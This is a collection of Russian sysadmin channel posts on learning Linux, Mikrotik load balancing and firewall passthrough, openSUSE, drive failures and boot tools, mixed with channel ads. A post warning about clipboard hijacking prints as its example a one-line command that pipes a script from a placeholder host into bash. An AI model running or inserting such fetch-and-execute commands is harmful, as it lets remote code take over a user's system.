​​Часто спрашивают: с чего начать изучение Linux?

Как правило просят посоветовать какие-то книги, статьи, курсы и т.д. и т.п. Естественно бесплатное.

На что я обычно отвечаю, что это так не работает и Linux они подобным образом не изучат.

Почему? А можно научиться водить автомобиль по книгам, статьям, роликам или даже записям курсов? Так чтобы сразу потом сесть и поехать. Не выйдет! Вот и я о том.

Какие альтернативы с автомобилем? Это или платные курсы, куда вы будете обязательно ходить и заниматься с инструктором. Либо учиться самостоятельно, как это было во времена нашей молодости: выехали на проселок с отцом и вперед, рули давай, жми педали.

Здесь ровно все тоже самое. Либо находите курсы с практической частью, платите за них деньги и занимаетесь. Мотивацией тут станет оплата, а так как деньги уплачены, то хочется, не хочется, а заниматься придется.

Второй вариант - это ставим себе практические задачи и начинаем их внедрять. Замахиваться на что-то сложное не надо, достаточно начать с того же VPN, SMB или чего-то аналогичного.

При этом не бездумно скопировать конфиги с какого-нибудь сайта, а разобраться в каждой строчке. Поиграть с настройками, посмотреть как себя ведет система в тех или иных условиях.

В свое время у нас был один преподаватель, который любил спрашивать так: вешал на доску принципиальную схему узла и говорил, мол вот этот элемент сгорел, оборвался, пробит и т.д. и т.п. Нужно было после этого рассказать как будет вести себя узел.

Так и здесь. Задайте себе вопросы: а что будет если... если закончится место на диске ...если закончится оперативная память ...если... да много всяких если можно придумать.

После того, как вы более-менее освоили какую-либо тему - начинайте внедрять ее на практике. На работе или дома. Сделайте, допустим, файлопомойку на Linux. Это поможет получить опыт эксплуатации и углубить владение предметом оттачивая тонкости на повседневных задачах.

Это кстати касается и курсов тоже. Любые знания должны применяться на практике, иначе это деньги м время на ветер. Особенно в IT, где все меняется очень быстро.

​​Mikrotik и несколько провайдеров. Балансировка каналов

Как мы уже говорили, сегодня очень многие рабочие процессы прямо зависят от наличия доступа в интернет, поэтому несколько каналов доступа - это не прихоть и не роскошь, а насущная необходимость.

Одной из первых задач, которые решаются несколькими каналами, является отказоустойчивость, но потом возникают иные вопросы, а именно полноценное использование двух каналов, ведь это совсем не дело если оплаченный резервный канал простаивает.

Поэтому в данной статье мы разберем методы балансировки каналов на оборудовании Mikrotik и рассмотрим связанные с этим проблемы и способы их решения.

https://interface31.ru/tech_it/2023/04/mikrotik-i-neskol-ko-provayderov-balansirovka-kanalov.html

​​openSUSE - все также надежен и практичен

Не так давно один из наших читателей посетовал, что мы совершенно несправедливо забыли про SUSE и это действительно так. А ведь это один из немногих полностью самостоятельных дистрибутивов наряду с Debian и Red Hat и также может похвастаться длительной историей.

Обладая гораздо меньшей популярностью дистрибутив всегда славился надежностью и практичностью, также на его основе была создана линейка коммерческих дистрибутивов SUSE Linux Enterprise.

Поэтому будет весьма любопытно посмотреть, что может предложить нам openSUSE сегодня и сравнить его с другими ведущими дистрибутивами.

https://interface31.ru/tech_it/2023/04/opensuse---vse-takzhe-nadezhen-i-praktichen.html

Подборка новых статей из Журнала Код. Канал про программирование. Понятно для новичка, интересно для эксперта. Без снобизма и душности объясняем сложные программистские штуки — подписывайтесь 🔥

1. Как пользоваться ChatGPT в России https://t.iss.one/thecodemedia/6886

2. ООП для новичков: классы и объекты https://t.iss.one/thecodemedia/6782

3. Запускаем Python-скрипт на сервере, чтобы он работал всё время https://t.iss.one/thecodemedia/6766

4. Метод Монте-Карло — один из самых полезных алгоритмов в ИТ https://t.iss.one/thecodemedia/6999

5. Делаем парсер, чтобы массово тянуть с сайтов что угодно https://t.iss.one/thecodemedia/6971

Вступайте в канал начинающих айтишников: @thecodemedia

​​Неочевидные угрозы из буфера обмена

Можно без преувеличения сказать - копипастить любят все, особенно длинные команды.

Но не все задумываются о неочевидных угрозах данного метода.

Дело в том, что в буфер обмена может попасть совсем не то, что вы видите на экране. Я думаю все сталкивались с подобным, когда вы копируете абзац, а в буфере к нему довеском оказывается:

 Информация с сайта https://example.com

Но это вполне безобидная штука, а ведь вместо обычной и безобидной

apt update

В буфере может оказаться:

curl -s https://example.com/script.sh | bash

Да еще и с символом переноса строки в конце, что автоматически запустит команду на выполнение сразу же после вставки.

А дальше, пока вы будете смотреть в экран и пытаться понять что происходит, произойти может всякое.

И это не страшилки, а вполне реальный сценарий, который применялся на практике для заражения систем вредоносным ПО.

Какой отсюда вывод? Не копипастить? Ну это не реально. А вот не тянуть сразу из браузера в терминал - это вполне по силам, чтобы понять что именно вы скопировали достаточно вставить содержимое буфера в любой текстовый редактор.

Хотите разобраться как дорабатывать и внедрять 1С так, чтобы заказчик был доволен, а у спеца не было головной боли? Об этом рассказывает бывалый 1С-ник на канале “Владимир Харин - Просто Pro 1С”. Владимир делится опытом, кейсами, наработками. Кратко, просто, полезно и с юмором.

О чем пишет? Ну, например
– Когда четкая постановка задачи заказчиком становится проблемой
– 5 недостатков кода, из-за которых его сопровождение превращается в ад, и что с этим делать
– Как можно сделать идеальную разработку, и при этом страшно накосячить
– Как подружить наработки пользователей в Excel с учетом в 1С

Присоединяйтесь!

​​Правильное использование Fast Path и FastTrack в Mikrotik

С самого основания данного ресурса мы не перестаем придерживаться мнения, что практика всегда должна опираться на необходимый теоретический минимум, давая в своих статьях порой обширные теоретические отступления.

Без теории практика превращается в подобие шаманских камланий с бубном, когда вроде сделал все тоже самое, но ничего не работает.

В этом плане технология FastTrack в Mikrotik, несмотря на всю свою простоту, держит пальму первенства по количеству возникающих с ней проблем, которые, в большинстве своем, возникают именно от незнания и непонимания работы этой технологии.

https://interface31.ru/tech_it/2021/09/pravilnoe-ispolzovanie-fast-path-i-fasttrack-v-mikrotik.html

✅ Статья обновлена и дополнена

Еще один 😥

Еще один "зеленый" WD отправился с в страну вечной охоты. Тоже SATA, хотя и форм-фактора M.2

Симптомы тоже причудливые. Он не дает с себя грузиться, если загрузиться с чего-либо еще - работает вроде бы нормально.

В общем "зеленая" серия зарекомендовала себя крайне отрицательно.

В ответственных местах рекомендуем под замену не дожидаясь. ☝️

​​Сегодня сложно представить современного админа без загрузочной флешки. Это просто, быстро, недорого и удобно.

Лучшим инструментом для создания мультизагрузочных флешей является Ventoy, о нем мы писали в статье:

🔹 Админу на заметку - 28. Создаем мультизагрузочную флешку с поддержкой ISO при помощи Ventoy

А чтобы не таскать на флешке целую кучу образов добавьте туда образ Netboot.xyz. Он позволяет выполнить сетевую загрузку и установку большого числа Linux-дистрибутивов и основанных на Linux служебных дисков.

Более подробно можно почитать здесь:

🔹 Админу на заметку - 27. Как установить любой популярный Linux по сети используя netboot.xyz

Оба эти проекта прекрасно дополняют друг друга и у нас это теперь набор по умолчанию. Интернет есть везде, поэтому если вдруг резко что-то понадобилось, то не нужно бежать куда-то и качать. Все можно загрузить и использовать "не отходя от кассы".

Подборка новых статей из Журнала Академии Яндекса. Они пишут для тех, кто выбрал путь в IT: про развитие, карьеру и будущее⚡
 
1. Как разработчику использовать Stack Overflow:
https://t.iss.one/journal_academy/774
 
2. Программируем на планшете: может ли IPad заменить разработчику ноутбук:
https://t.iss.one/journal_academy/745
 
3. Какие функции Figma полезны разработчикам:
https://t.iss.one/journal_academy/791
 
4. Как эффективно учиться во взрослом возрасте:
https://t.iss.one/journal_academy/652
 
5. 6 советов побороть прокрастинацию:
https://t.iss.one/journal_academy/800
 
Вступайте в сообщество увлечённых айтишников:
Журнал Академии Яндекса

Не все йогурты одинаково полезны! ☝️

При подготовке материалов мы всегда внимательно изучаем то, что написано в сети. Встречается разное.

Данный пример найден нами на сайте одной аутсорсинговой компании. Работать он, конечно же, не будет. Мало того, выход в интернет полностью пропадет. 🤬

Кто скажет почему? 🤔

На скриншоте убрана часть конфигурации не относящаяся к вопросу.

Правильный ответ будет позже.

​​Продолжаем вчерашнюю тему.

К сожалению, следует признать, что маркировка пакетов и балансировка для многих темный лес. Предположения были самые разные, но все они были далеки от истинной причины. Как говорится, искали не там, где потеряли, а там, где светлее. 🤷‍♂️

Поэтому сегодня букв будет много. Начнем с того, что балансировать нужно соединения. Критически важно, чтобы для каждого отдельного соединения пакеты уходили только через один канал.

При этом желательно вообще все соединения отдельного узла выпускать только через один канал, но это уже тонкости. Главное: одно соединение – один канал.

Теперь о брандмауэре, брандмауэр работает с пакетами, а не с соединениями. Более того, брандмауэр не знает какому соединению принадлежит пакет.

Но мы можем видеть статус соединения: новое, установленное, связанное и т.д.

Поэтому наша цель отловить новые соединения и промаркировать их. Затем все пакеты уже установленного соединения будут автоматически промаркированы выбранной маркой. При этом следует понимать, что марка существует только в брандмауэре, никаких изменений в сами пакеты не вносится.

А потом, на основании метки соединения мы делаем mark-routing, т.е. ставим на пакет еще одну метку, на основании которой он пойдет в ту или иную таблицу маршрутизации. Эта метка тоже сугубо виртуальна и существует только внутри брандмауэра.

А теперь посмотрим в приведенный нами пример. Вы где-нибудь там видите маркировку соединений? Нет. Потому что соединения никто промаркировать не удосужился.

Там сразу берут пакеты с адресом источника локальной сети и ставят им метку маршрутизации. Не соединениям, пакетам!

А что такое NTH? А это элементарное на первый-второй рассчитайся. Как на уроках физкультуры. В итоге пакеты даже одного соединения легко раскидает по разным каналам. В подавляющем большинстве случаев для соединения это будет фатальным. Исключения – когда достаточно одного пакета туда и одного обратно.

В итоге интернет просто ляжет. 🙈

Ошибка очень грубая и плохо что практически никто ее сразу не нашел. 😥

О том, как сделать правильно – читайте в нашей статье:

https://interface31.ru/tech_it/2023/04/mikrotik-i-neskol-ko-provayderov-balansirovka-kanalov.html

🚩Аккредитованная IT-компания RG-Soft набирает команду программистов и аналитиков 1С.

Возможна удаленная работа.

💪RG-Soft это:

✔️17 собственных разработок для различных отраслей бизнеса.

✔️Победитель проект года 1С.

✔️3100+ внедренных решений.

✔️1000+ обученных специалистов.

✔️20 лет опыта подтвержденных положительными отзывами клиентов.

📍Подробнее о вакансиях: https://hr.rg-soft.ru/

🙋‍♂️Будем рады видеть тебя в нашей команде!

​​Что такое passthrough в брандмауэре Mikrotik и зачем он нужен

Обсуждение в предыдущих постах показало, что далеко не все понимают назначение флага passthrough в брандмауэре.

Начнем с того, что вспомним принцип работы брандмауэра: пакет движется по цепочке пока не будет совпадения с критериями правила.

Затем к пакету применяется действие. Если действие является терминирующим, то пакет прекращает движение по цепочке и переходит в следующую. Если действие не терминирующее, то продолжает.

В таблицах nat или filter большинство действий является терминирующими, за редкими исключениями, например, добавить адрес в список.

А вот с таблицей mangle все по другому. Там у нас появляется выбор. Обычно все действия по маркировке пакетов и соединений начинаются в цепочке prerouting данной таблицы.

Хорошо, вот кинули мы марку на соединение, а дальше что? А дальше все зависит от последующей логики. Если потом эту марку мы будем использовать где-нибудь в nat или filter, то пакет можно смело терминировать. Делать в этой цепочке ему больше нечего.

А если нам нужно затем промаркировать пакеты на основании марки соединения, скажем, сделать им mark-routing, то терминировать пакет никак нельзя. С таблицей маршрутизации надо определиться здесь и сейчас, до принятия решения о маршрутизации.

И здесь нам на помощь приходит как раз passthrough, установка этой опции делает правило не терминирующим. И пакет продолжает движение по цепочке дальше.

Таким образом, если у нас есть два правила, в первом из которых мы маркируем соединения, а во втором пакеты. То в первом мы ставим флаг passthrough, а во втором уже нет.